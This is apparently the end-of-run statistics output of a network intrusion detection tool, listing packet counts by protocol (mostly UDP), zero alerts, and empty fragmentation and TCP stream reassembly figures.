Breakdown by protocol: TCP: 7 (7.609%), UDP: 85 (92.391%), ICMP: 0 (0.000%), ARP: 0 (0.000%), IPv6: 0 (0.000%), IPX: 0 (0.000%), OTHER: 0 (0.000%). Action Stats: ALERTS: 0, LOGGED: 0, PASSED: 0. =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================